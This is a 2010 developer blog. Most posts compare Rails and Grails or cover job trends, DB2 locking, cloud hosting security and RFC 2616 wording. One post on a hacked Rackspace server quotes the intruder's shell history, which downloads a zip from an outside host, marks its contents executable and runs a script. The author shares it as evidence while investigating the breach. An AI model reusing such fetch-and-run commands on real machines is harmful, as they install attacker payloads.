Wednesday, October 27, 2010

Rails and grails package management

Next on my agenda for comparing these two frameworks is package (aka dependency) management. Up until the release of Rails3, I would say grails was the hands-down, clear-cut winner in this regard. Grails was engineered from VERY early on with the idea of dependency management being core to the framework. IMHO, this further illustrates how grails advanced the state of the art by sanding some of the rough edges off of rails. If I were in charge of an IT department, I still think grails has a bit of an edge from a management perspective, but it does lose out a little in the flexibility department.

Ruby (via the gem mechanism) still suffers greatly from "gem hell" problems. Rails3 takes a step in the right direction by making bundler a core part of how applications are configured. Grails, on the other hand, is moving toward using maven as its standard dependency management solution. In fact, grails has supported this for a number of years now and it works pretty well.

Where grails and maven suffer is that they are VERY opinionated. Unless you embed a jar directly in your project, it is very difficult to deviate from the "maven" way of packaging things. This means that building off a dev/snapshot package can be problematic (especially if you need to switch repositories often). Rails/Bundler, on the other hand, while still pretty opinionated, lets you pick the method you want to use to pull your dependencies in. You can pull individual gems from git, some stuff from github, and some stuff off your local machine. By embracing the culture of "everyone pitch in", they are offering the most flexible solution possible.
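
To make that flexibility concrete, here's a rough sketch of a Gemfile; the gem names, git URL, and local path are just illustrative placeholders, not a recommendation:

source 'http://rubygems.org'

gem 'rails', '3.0.0'
# pulled straight from a git repository (handy for dev/snapshot builds)
gem 'some_gem', :git => 'git://github.com/someone/some_gem.git', :branch => 'master'
# pulled from a checkout sitting on your local machine
gem 'another_gem', :path => '~/src/another_gem'

Running bundle install resolves and locks all of these, regardless of where each one came from.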

On the other hand, asking 3 people how to properly include a library in a rails project will likely net you 4-5 different answers. Grails, by contrast, will likely only net you 2 answers...

Which of these two methods is better is left to you... I prefer the flexible approach of rails when developing software, but the more controlled mechanism of grails when maintaining software and infrastructure.

Tuesday, October 26, 2010

Rails and grails job scheduling

In my continuing comparison of ruby on rails to groovy and grails I've discovered another big difference. Grails has excellent support for job scheduling, whereas the existing rails plugins are confusingly complicated.

In grails, to set up a job, install the quartz plugin:

grails install-plugin quartz
grails create-job MyJob

and edit the new class called MyJob:

class MyJob {
    static triggers = {
        simple name: 'mySimpleTrigger', startDelay: 60000, repeatInterval: 1000
    }

    def group = "MyGroup"

    def execute() {
        print "Job run!"
    }
}


Done. You now have a job running inside your application at a repeating interval. The plugin supports cron-like syntax as well as custom triggers.

Rails, on the other hand (much like perl ;), has more than one way to do it. The biggest thing I notice is that most of the rails plugins either #1 require you to schedule a unix cron job, or #2 require you to run another ruby process to do the scheduling. The fundamental difference is that the "ruby way" is to create a new process manually instead of forking a process or new thread in the initialization of your application (like the java/grails way).
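
For example, one popular cron-based option is the whenever gem. A rough sketch of its config/schedule.rb might look like the following (the job and task names here are made up for illustration):

every 1.hour do
  # cron fires up a fresh rails runner process each time
  runner "ReportJob.run"
end

every 1.day, :at => '4:30 am' do
  # or kick off a rake task
  rake "reports:nightly"
end

You then run whenever --update-crontab to write the corresponding crontab entries, which drives home the point: the scheduling still lives outside your application process.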

The rails wiki lists some other ways to do it.

In short, background job scheduling is something that grails took a completely different approach with. By leveraging the quartz library and embracing all the multithreaded goodness that is a modern J2EE container, grails makes a compelling case for "this is the way you do it". Rails, on the other hand, for all its "convention over configuration" talk, has a rat's nest of confusing methods to accomplish a fairly routine and simple task.

The fundamental problem with this sort of activity in rails is that the underlying architecture isn't designed around the concept of a long-running process that services multiple simultaneous activities. In my head, this is a pretty important consideration when you start thinking about managing more than a simple CRUD application. The rails way is to essentially ignore this and let folks run amok building random plugins. The grails way is to treat this as a fundamental (though optional) part of building web applications.

Monday, October 25, 2010

Technology and programming trends

As a technologist, I'm always keeping my eyes on the market. There's nothing worse from a marketability perspective than being the best chariot wheel repairman when the entire world has moved on to automobiles. If you're going to be in a niche, you'd better be in one that is HIGHLY lucrative.

To this end, I took a look on indeed.com and tried to see how various programming languages stacked up as far as job postings.


Obviously this is not comprehensive, but it shows what I "kinda" already knew. C is king, with java taking a large secondary position and C# following up behind java. One thing to note is that the largest percentage shown on that chart is 4%. This roughly means that the market is SO fragmented that even the leader only captures 4%. For the COBOL folks clinging on for dear life... hopefully you're near retirement age, because right now finding a COBOL job is going to be pretty difficult.

Now for a more interesting perspective. Let's rescale everything relative to its position a few years ago and plot the numbers as percentage growth.


Whoa! This paints an interesting picture. We see that a few new upstarts (erlang, ruby, and groovy) are taking off. Furthermore, we see that of those 3, ruby actually scores higher in absolute market share than a lot of established players.

These charts, however, only show part of the picture. Right now, mobile, social media, and cloud skills are just as important as expertise in any particular programming language. In fact, the value of twitter (for example) is not really from the languages used (scala, ruby), but from the social effect gained by using the technology.

For the next group, I eliminated C just because it was so much higher than everything else, but also because a lot of C positions are for things that aren't really trending upward. So now let's look at a few "hot" technologies scored against some programming languages.


We can see that the mobile/cloud/social space doesn't seem to have broken too far into the market yet. However, when we look at growth:


We see that twitter (holy smokes), facebook, and iPhone are all growing exponentially upward. Now part of this is because they haven't been around very long, but if you take away the leaders and REALLY look at the numbers:

We can see that, while the market is still relatively small, at .6% it is roughly 1/6th the size of the leader (C), and that, coupled with large growth, indicates to me that it might be a good place to be. Note: I added sharepoint to the second slide because I keep seeing postings for it and it DOES seem to have a nice position... Its growth, however, is linear, and I'm more interested in the rate of increase of the growth for the time being.

I realize this isn't a highly scientific study and there are a ton of holes in the analysis, but the point is that things are starting to break free of the traditional "I'm a java guy" perspective and trending toward technologies that require integration. In addition, given how small a share of the market even the leading language has, there is a compelling case to be made for being a polyglot.

Thursday, October 21, 2010

Hacked Server on Rackspace

Last month, I had a cloud server exploited and couldn't figure out how it happened. After a little investigation, I've got a good news bad news situation. The good news is that I DID manage to contact someone at rackspace who could help me out and they re-enabled my account.

The bad news is that the server wasn't pretty. On the upside, it must have been hacked by a script kiddie, as they did NOT cover their tracks very well at all. On the downside, they did NOT appear to have used the single user account I created and somehow entered through either the rackspace admin network (SPOOKY, inside job?) or one of the default services installed with Ubuntu 10.04 LTS (still not good).

From my root .bash_history, I noticed the following (the first few lines may have been me):
exit w
w
passwd
cd /var/tmp
la
wget hacker.go.ro/go.zip
unzip go.zip
cd go
chmod +x *
./go.sh 112
cd /var/tmp
cd go
chmod +x *
./go.sh 220

In my /var/tmp/go directory I have a bunch of stuff that I'm looking at right now, but of specific interest are a couple of Chinese servers that appear to have been used in the heist.

In short, Rackspace did a good job during "normal business" hours of helping me out, but I certainly ran into a few pretty serious drawbacks. Notably:

#1 By default, servers are built and exposed to the internet immediately.
#2 There is no mechanism to set up mini DMZs or other ways to cordon off traffic, except through software controls (on servers that are already potentially p0wn3d).
#3 There is no weekend support as far as I can tell.

A big plus to having the server physically sitting on site is that, unless you get locked out of the server room, you can ALMOST always reboot the server from a CD and reinstall the OS. If your hosting provider decides to disable your cloud network console, you're kinda out of luck.

Overloaded terms in the Ruby community

I've been refactoring some tests and changed them from using a global set of users/roles defined as fixtures to instead using factories.

OK, for java folks I'm going to give you the secret ruby decoder ring.

Fixtures = predefined data that you create by manually seeding via seed.rb
Factories = data generated via a factory method at runtime

It's interesting that the ruby community has decided to overload the meaning of these terms to be very specific. I say this because in the "rest of the world", when dealing with testing, a test fixture is a much more generic concept. Typically it is the thing that sets up the test and tears down the test. Yes, often it creates data, but that is not necessarily its job.

Factories = This is a term that alludes to a well known and fundamental design pattern that can be used for a million different things and honestly has fallen out of vogue with java folks in favor of using dependency injection instead. It seems many folks think that using a factory to generate data for a test case has some inherent advantage over using pre-seeded global data (or other patterns). The primary advantage stated is that it moves the generation of the data closer to the thing being tested.

This is a very good reason, but it doesn't actually eliminate fixtures (generally speaking), it simply moves the fixture from a global scope into a more specific scope. The obvious downside to this is that for things that recur in multiple scopes, you are now repeating yourself.
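
To make the distinction concrete, here's a rough, hypothetical sketch (the model, attributes, and assertion are all made up); the data that might have lived in a global fixture is instead built by a factory-style helper sitting right next to the test that uses it:

# a small factory-style helper defined near the tests that need it
def create_admin_user(attrs = {})
  User.create!({ :name => 'admin', :role => 'admin' }.merge(attrs))
end

class AdminDashboardTest < ActiveSupport::TestCase
  test "admins can see the dashboard" do
    user = create_admin_user            # the data is created here, in this scope...
    assert user.can_see_dashboard?      # ...instead of living in a global fixture file
  end
end

The setup/teardown role of the fixture hasn't gone away; it has just moved into the test's own scope.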

Wednesday, October 20, 2010

Ruby on rails and groovy grails comparison

As a person who has had the luxury of working in both ruby on rails and groovy/grails, I've found a few things that make their approaches quite a bit different.

#1 Groovy allows you to write java. While this isn't a huge deal, it can be both a positive and a negative. I've worked on teams where folks treat grails as a super simple java framework and never leverage any of groovy's dynamic goodness. While this isn't a huge problem, it does delay (or eliminate) the transition from J2EE xml configuration file hell into a more dynamic way of coding.

#2 Ruby forces you to learn "the ruby way". For folks who are only used to java, seeing ruby code is like... seeing another language. Because of this, the idioms used in java are more quickly forgotten and you more quickly become a ruby native because you MUST. Having only worked with a few other people while they moved from java to ruby, I can mostly speak from my personal experience. I can say that ruby's syntax is not THAT much different as long as you keep an open mind, and I found I was able to learn the "ruby way" more quickly than I was able to learn the "groovy way", simply because I was FORCED to do it with ruby.

#3 Rails uses db migrations by default. This is a huge plus for db CRUD applications. It enables you to make sure you have a migration path from version to version of your code (see the sketch after this list). Grails, on the other hand, doesn't come with anything (by default) to handle this.

#4 Rails has a sparse model class definition. Should you decide NOT to use db migrations, you can simply create some tables in your database, create an empty ruby class, and begin using it. You don't need a class definition that matches the db table, because the fields are put on the class via introspection of the table. This then frees you to only implement business functionality on your model.

#5 Grails integrates seamlessly with most modern J2EE environments. Newer versions of spring allow you to code groovy code INSIDE your spring configuration xml. Grails creates a war file that can be deployed with little or no modification directly into a J2EE container. Rails CAN be integrated in a similar fashion, but it is really a kind of frankenstein implementation to get JRuby on rails via a J2EE container.

#6 Ruby on rails is MUCH more nimble and dynamic for building functionality. Grails enables taglibs and meta-programming, but many of the DSLs quickly get cluttered with java-like confusion that doesn't really have any business advantage. In addition, because of the way grails works with classloading in servlet containers, it is constantly restarting the container to pick up new functionality. With rails, I can reinitialize the database, drop/create tables, completely redesign the application, and it will typically continue to run without a hitch. I've often gone an entire day adding/removing domain classes, changing controllers, and rebuilding tag libraries, and my rails engine never has to be restarted.

#7 The groovy and grails community is more organized. That having been said, they're both pretty disorganized and certainly the "herd of cats" syndrome is running rampant in both of them. However, when I google "groovy roadmap", my first hit is http://groovy.codehaus.org/Roadmap, while "ruby roadmap" gets me http://redmine.ruby-lang.org/projects/ruby-19/roadmap. You choose which one seems more organized.

#8 The ruby community is larger. While still pretty small compared to the likes of PHP or java, you can't throw a stick without hitting someone who has at least heard of ruby on rails. Groovy/Grails is still pretty small. On the other hand, I would point out that the grails community is growing, whereas the rails community's growth seems to have leveled off in the last year or so.
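
To illustrate points #3 and #4 above, here's a minimal sketch of a rails migration plus the correspondingly sparse model class (the table and column names are just examples):

class CreateProducts < ActiveRecord::Migration
  def self.up
    create_table :products do |t|
      t.string  :name
      t.decimal :price
      t.timestamps
    end
  end

  def self.down
    drop_table :products
  end
end

# the model stays sparse; the columns come from introspecting the table
class Product < ActiveRecord::Base
end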

In conclusion, there are a lot of other factors that make selecting one or the other of these better or worse. If I were to learn only one of these and had no prior experience, I would probably learn ruby and rails just because of the size of the community. If I were a java person, I would likely start with groovy/grails just because the learning curve is going to be less steep.

Friday, October 8, 2010

jQuery ajax performance tuning

Modern web applications are all about user experience and a major factor in this is performance. A user interface that is laggy or gives the appearance of slowness will drive users away as quickly, if not more quickly, than an ugly and unintuitive one.

This having been said, sometimes there are things that are just plain slow. Answering questions like "calculate the price for all 2 million products we sell in the north american market and present the top 10 with at least 50 in stock at a Distribution center within 50 miles" can often take some time. Couple these complex business rules with rich and powerful user interfaces and you have a potential for slowness to silently creep into your application. Digging through a few of the more modern javascript libraries, there are a number of strategies to combat this. We'll use the jquery datatable to illustrate some simple speedups that might apply.

For our situation, let's pretend the above mentioned query takes 500ms and the time to actually render the html for the rest of the page takes 500ms (until document ready). There are three general ways to get your front-end widget to initialize. In the interest of simplifying things, we're going to assume outside factors (like network congestion, server availability, etc) are not influencing our decision.

method 1 - put the data in the html/dom

This is often the simplest way and has the added benefit of degrading gracefully when a user has a browser that doesn't have javascript enabled. The downside is that the trivial implementation will generally require the aggregate of the two times in order to complete (read: 1 second).

method 2 - put the data as an ajason request (not ajax, because who uses xml on the web any more?)

This has the benefit of enabling the server to send back the core html (500ms) and THEN having the page fetch the data. This means the user has SOME content in 500ms, and instead of staring at nothing (or the old page) for 1 second, they see SOMETHING in 500ms. This has the downside of actually requiring the same amount of time (if not more) than the above method. The biggest benefit is that it CAN make the system seem more responsive.
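
On the rails side, method 2 just needs an endpoint that returns the data as json; here's a hypothetical sketch (the controller, action, and query names are made up for illustration):

class ProductsController < ApplicationController
  def top_table_data
    # the page renders first, then the datatable fetches this via an xmlhttp request
    render :json => Product.top_ten_in_stock
  end
end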

method 3 - put the data as a javascript include

OK, this one is a little wacky, but it can make things even faster than either of the two above. In this method, instead of wiring the data into an xmlhttp request that is fetched after the DOM is loaded, you put a link in the document (probably in the head) that points to a dynamically generated javascript file that will wire the content into the dom as soon as the required parent element shows up. This has the advantage of allowing the fetch of the data to proceed BEFORE the dom has fully loaded. In practice, this starts to become more performant when you have larger documents with complicated controls and markup in them.
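
Sticking with the hypothetical rails example above, a rough sketch of method 3 might look like this; again, all the names are made up for illustration:

# The page's <head> includes something like:
#   <script type="text/javascript" src="/products/top_table.js"></script>
class ProductsController < ApplicationController
  def top_table
    # the slow (~500ms) query gets kicked off while the rest of the page is still loading
    @products = Product.top_ten_in_stock
    respond_to do |format|
      # renders top_table.js.erb, which emits javascript that waits for the
      # table's parent element and then wires the rows into it
      format.js
    end
  end
end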

I don't necessarily recommend this approach as a de facto starting point. Before going down this path, you should make sure you've done the following:
  • minify and consolidate all your css and js
  • consolidate and pack all your images
  • use a cdn or edge server for static assets and content
  • properly set cache-control headers and use etags where appropriate

Don't start with this approach, but it is certainly a way to squeeze a little more performance out of your user interface.

Wednesday, October 6, 2010

Amazon EC2 versus rackspace cloud hosting

I recently needed to stand up a DB2 server and was going to reach for my trusty rackspace account, but didn't feel like setting up DB2 for an experiment that would only last a few hours.

Instead I turned to amazon. It turns out that amazon has preconfigured images for ubuntu/db2 that you can spin up almost instantaneously. In addition, their security model is a little more robust. Here are the key things they do right from a security perspective (compared to rackspace):

#1 They never send you a root password (via email or otherwise). You must generate a public/private key pair and download the key via https. Assuming you keep your secret key secure, there is minimal (if any) opportunity for someone to steal this key. Even if they hack your amazon account, I'm not sure they could get to your server immediately, even though they certainly could shut it down.

#2 By default you are behind a firewall so that only a minimal set of tcp ports are even open. You need to actually take action before they will allow ssh access to the server.

#3 The root account is locked and cannot log in from a remote location. You MUST log in via a "normal" user (ubuntu on this image) and then switch to root.

All told, it seems like EC2 has a more secure default setup than Rackspace. I haven't yet compared pricing or service levels on the two, but purely from a security perspective, AWS certainly has its stuff together.

Monday, October 4, 2010

db2 locking and MVCC

I had an interesting discussion about locking in db2 a while back. It was interesting because it challenged some long-held assumptions I had about db2 and how it handles locking. As usual, when I started digging deeper it turned out it is much more complicated than it would seem on the surface.

First off, some background: I was having a conversation with a colleague about locking in various DBMS's and I made the statement that DB2 doesn't support MVCC. Thus, I contended, it is not possible for someone to read the previous version of a row that I have updated while I'm in a transaction that has altered it. At this point the fellow I was talking to looked at me as if I had just grown an arm out of my forehead. He stated (correctly, it turns out) that DB2 has supported this almost forever.

I was, however, VERY confident that I was correct and subsequently dug up the documentation. Oddly enough, the documentation seemed to support the notion that I was mistaken (gasp!). Well, at this point I HAD to get to the bottom of this.

So, I fired up an amazon ec2 instance with ubuntu and db2 9 udb and started my test.

First, I created a tablespace and a table:
create tablespace test1
create table test (id integer)


Then I fired up squirrel sql with two different connections, turning off autocommit on both.
First I seeded some data:
insert into test values (1)
insert into test values (2)
commit
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
select * from test where id = 1

When I issued the select on the second connection, in my head, it should have blocked until the update on connection 1 finished, but it came back immediately. So now I had to sit back and wonder: "Am I imagining this behavior?" When I stop to think about it, my position seems suspect no matter how you slice it.

So I reread the definitions of db2's lock levels (http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/) as well as some ways things can go haywire (http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/) and got to thinking back about the situation that caused me to think this.

The key thing that I was missing is that this ONLY applies to readers; if I change the second statement to an update, it WILL block (by default). So for example, if we run THIS sequence:
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
update test set id = 100 where id = 2

The second update will wait for the first one to finish. By comparison, in an MVCC database, a concurrent reader could continue to operate with the version of the row as it was when its transaction began (concurrent writers on the same row will still generally block each other). This is the key thing that kept confusing me. DB2 treats readers and writers as unequal partners in the database instead of putting them on equal ground. While readers typically don't block, it's the writers that will cause problems.

In all honesty, it sounds like there IS a setting in newer versions of db2 to enable MVCC-like behavior (I believe it's the "currently committed" semantics added in db2 9.7), but it is NOT the default. In addition, there is certainly overhead to maintaining versions of data just to keep readers and writers out of each other's way. Certainly for read-intensive operations, it might not be worth the overhead.

For a nice article, take a peek here: http://www.rtcmagazine.com/articles/view/101612

Mike.

Saturday, October 2, 2010

HTTP 1.1, rfc 2616 and reading comprehension

I've read with interest some documentation from Microsoft about how the HTTP 1.1 specification mandates some behavior. To quote:
WinInet limits connections to a single HTTP 1.0 server to four simultaneous connections. Connections to a single HTTP 1.1 server are limited to two simultaneous connections. The HTTP 1.1 specification (RFC2616) mandates the two-connection limit.

This seems to be saying that browsers are only allowed (via some mythical mandate) to use two connections per server and any connections past two must block. After reading through the http 1.1 specification (again), I'm troubled that many folks have seriously misinterpreted this requirement. This is especially troubling because the manner in which RFCs are written is VERY explicit, and it is (for me) really easy to understand the difference between a requirement and a recommendation. What is even more troubling is that people quote the microsoft reinterpretation of the specification as if it were a direct quote of the specification.

So for my example, the top of RFC 2616 states:
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in RFC 2119 [34].

If we chase down RFC 2119, we find:

1. MUST This word, or the terms "REQUIRED" or "SHALL", mean that the
definition is an absolute requirement of the specification.

2. MUST NOT This phrase, or the phrase "SHALL NOT", mean that the
definition is an absolute prohibition of the specification.

3. SHOULD This word, or the adjective "RECOMMENDED", mean that there
may exist valid reasons in particular circumstances to ignore a
particular item, but the full implications must be understood and
carefully weighed before choosing a different course.

4. SHOULD NOT This phrase, or the phrase "NOT RECOMMENDED" mean that
there may exist valid reasons in particular circumstances when the
particular behavior is acceptable or even useful, but the full
implications should be understood and the case carefully weighed
before implementing any behavior described with this label.

Then in the http spec we see:
Clients that use persistent connections SHOULD limit the number of simultaneous connections that they maintain to a given server. A single-user client SHOULD NOT maintain more than 2 connections with any server or proxy. A proxy SHOULD use up to 2*N connections to another server or proxy, where N is the number of simultaneously active users. These guidelines are intended to improve HTTP response times and avoid congestion.


What's my problem?
  • If someone has taken the time to formally define things in a certain context, it is professionally irresponsible to change the meaning of their statements.
  • If you are distributing technical documentation, make sure you have your facts right and use unambiguous language. Remember, not everyone speaks English as their native language, nor do they necessarily have the inclination to go chase down quoted sources.
  • If you are trying to cite documentation, chase down the originator; don't rely on second, third, fourth, or nth parties to give you your information unless you REALLY trust them.

Let's dissect a portion of the original quote:

Connections to a single HTTP 1.1 server are limited to two simultaneous connections.

Which of the following statements does this concretely assert?
  • An HTTP server will not accept more than two simultaneous connections.
  • An HTTP server might accept only two connections or might accept more
  • Clients cannot make more than two simultaneous connections to the same server
  • Clients can actually make more than two simultaneous connections, but we've limited them to two

For the lay person (other than perhaps lawyers), these distinctions probably seem like minute and petty semantic wrangling. For professional software developers they are, however, terribly important.

Why? Because computers don't exactly do what you want them to do, they do exactly what you tell them to do.

Reread that a couple of times please...

Any subjective interpretation you are expecting the computer to do on your behalf does NOT happen, and anybody who's used a computer has probably run into problems where the computer is not doing what you want and you are unable to understand why. There are millions of lines of code you are interacting with, and their behavior is often specified with ambiguous language like the original paragraph. More importantly, they are restated and modified via the "telephone game" effect such that the original requirements are completely lost.